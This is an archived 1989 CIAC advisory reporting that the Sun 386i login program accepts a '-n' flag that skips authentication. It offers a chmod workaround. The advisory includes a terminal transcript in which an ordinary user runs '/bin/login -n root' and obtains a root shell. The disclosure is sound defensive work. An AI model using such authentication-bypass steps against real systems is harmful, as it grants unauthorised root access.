Authentication bypass in Sun 386i machines

The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

________________________________________________________________
		THE COMPUTER INCIDENT ADVISORY CAPABILITY

 				CIAC

			ADVISORY    NOTICE
________________________________________________________________


                     COMPUTER SECURITY INFORMATION

  		 Authentication bypass in Sun 386i machines

The login program supplied by Sun for its 386i machines, version 4.0.1 of Sun 
OS (SOS), accepts the argument "-n" which bypasses authentication.  It was
apparently added in order to allow the Sun program "logintool" to do the
authentication and have login do the housekeeping.  This allows a user who
discovers the new argument to the login program to become a root user in 
several ways.  An example of one method is attached. 

A temporary solution is to disable logintool and patch the binary using 
the "strings" and "adb"method used last November.  Alternatively and more 
simly, log in a root and issue the command

			chmod 110 /bin/login

Example of login endrun:
---------------------------------------------------
Script started on Tue Apr 11 14:16:25 1989
myhost[1] whoami
oconnor
myhost[2] /bin/login -n root
Login incorrect
login: onceuponatime
No home directory specified in password file!  Logging in with home=/
# whoami
root
# who a i
myhost!onceupon ttyp2   Apr 11 14:17
# ^D myhost1[3] ^D
script done on Tue Apr 11 14:17:34 1989
---------------------------------------------------

Sun is presently working on a patch.  When it is available, CIAC will
inform you accordingly. 

For questions or additional information, please contact

                                 Gene Schultz
                                 CIAC Team Leader
                                 (415) 422-8193 or FTS 532-8193
                                 gschultz%[email protected]